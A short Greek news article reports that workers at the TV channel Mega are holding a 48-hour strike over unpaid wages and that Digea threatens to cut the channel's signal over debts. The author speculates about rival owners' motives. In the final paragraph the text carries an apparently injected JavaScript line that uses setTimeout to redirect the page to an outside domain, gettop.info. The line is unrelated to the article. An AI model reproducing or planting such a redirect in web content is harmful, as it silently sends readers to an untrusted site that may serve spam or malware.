Μega: 48ωρη απεργία αύριο και μεθαύριο

Οι εργαζόμενοι στο Μega επαναβεβαίωσαν την απόφασή τους να προχωρήσουν σε 48ωρη απεργία αύριο και μεθαύριο, καθώς δεν ικανοποιήθηκε το αίτημά τους να πληρωθούν δυο μισθούς από τους συνολικά οκτώ που τους οφείλονται.

Αυτό πρακτικά σημαίνει ότι ο σταθμός την Τρίτη και την Τετάρτη δε θα μεταδίδει διαφημίσεις, αλλά μόνο το ψυχαγωγικό πρόγραμμα -κονσέρβα.

Η κρίσιμη μέρα είναι η Πέμπτη για το κανάλι. Η Digea έχει διαμηνύσει ότι θα «αδυνατίσει» το σήμα του (πρακτικά αυτό σημαίνει ότι θα είναι αδύνατο να το παρακολουθήσει κανείς), αν δεν εξοφληθεί πλήρως το ποσό των περίπου 900 χιλιάδων ευρώ που της οφείλει.

Με δυο λόγια, οι υπόλοιποι καναλάρχες απειλούν να ρίξουν «μαύρο» στο Mega. Γιατί; Μήπως διότι καταφέρνει να διατηρεί αξιοπρεπή ποσοστά τηλεθέασης και να παίρνει από τις διαφημίσεις 2,5 με 3 εκατ ευρώ το μήνα; Χρήματα, τα οποία βέβαια καταλήγουν σε δεσμευμένους από τις τράπεζες λογαριασμούς. Δεν είναι λογικό να πιστεύουν οι άλλοι καναλάρχες ότι θα μοιράζονταν οι ίδιοι τα χρήματα αυτά, αν έκλεινε το Mega; setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

Σχετικά Άρθρα


Αφήστε το σχόλιο σας

*